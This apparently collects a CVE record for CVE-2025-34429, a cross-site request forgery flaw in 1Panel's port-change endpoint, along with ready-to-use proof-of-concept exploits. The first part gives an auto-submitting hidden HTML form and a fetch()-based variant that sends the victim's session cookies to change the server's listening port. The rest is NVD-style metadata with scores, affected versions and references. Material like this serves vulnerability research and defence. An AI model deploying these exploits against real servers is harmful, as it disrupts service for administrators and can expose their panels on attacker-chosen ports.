CVE-2025-34429

<!-- CSRF PoC for CVE-2025-34429: 1Panel Web Port Configuration Change --> <!DOCTYPE html> <html> <head> <title>1Panel Port Change CSRF PoC</title> </head> <body> <h1>1Panel CSRF Vulnerability Test (CVE-2025-34429)</h1> <p>This PoC demonstrates CSRF vulnerability in 1Panel web port configuration.</p> <script> // Auto-submit the form when page loads window.onload = function() { document.getElementById('csrfForm').submit(); }; </script> <!-- Change the port to 8080 - adjust 'new_port' value as needed Target endpoint may vary based on 1Panel version --> <form id="csrfForm" action="http://target:65421/api/settings/port" method="POST" style="display:none;"> <input type="hidden" name="port" value="8080"> <!-- Alternative parameter name --> <input type="hidden" name="new_port" value="8080"> </form> <p>If port change was successful, you would see the response below:</p> <iframe name="responseFrame" style="width:100%; height:300px;"></iframe> <p><strong>Note:</strong> This is for educational and security testing purposes only.</p> </body> </html> <!-- Alternative PoC with fetch API --> <script> // Async CSRF PoC using fetch async function exploitCVE202534429() { const targetUrl = 'http://1panel-server:65421/api/settings/port'; const newPort = 8080; const formData = new URLSearchParams(); formData.append('port', newPort); try { const response = await fetch(targetUrl, { method: 'POST', mode: 'no-cors', // Bypass CORS for CSRF credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: formData.toString() }); console.log('Port change request sent'); } catch (error) { console.error('Exploitation failed:', error); } } exploitCVE202534429(); </script>

{"cve": {"id": "CVE-2025-34429", "sourceIdentifier": "[email protected]", "published": "2025-12-10T19:16:13.720", "lastModified": "2025-12-23T15:07:53.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "1Panel versions 1.10.33 - 2.0.15 contain a cross-site request forgery (CSRF) vulnerability in the web port configuration functionality. The port-change endpoint lacks CSRF defenses such as anti-CSRF tokens or Origin/Referer validation. An attacker can craft a malicious webpage that submits a port-change request; when a victim visits it while authenticated, the browser includes valid session cookies and the request succeeds. This allows an attacker to change the port on which the 1Panel web service listens, causing loss of access on the original port and resulting in service disruption or denial of service, and may unintentionally expose the service on an attacker-chosen port."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.10.33-lts", "versionEndIncluding": "2.0.15", "matchCriteriaId": "4044A6FA-6EC3-4541-99AB-0FE6A1109FAF"}]}]}], "references": [{"url": "https://1panel.pro/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/1Panel-dev/1Panel/releases", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/1panel-csrf-web-port-configuration-change", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}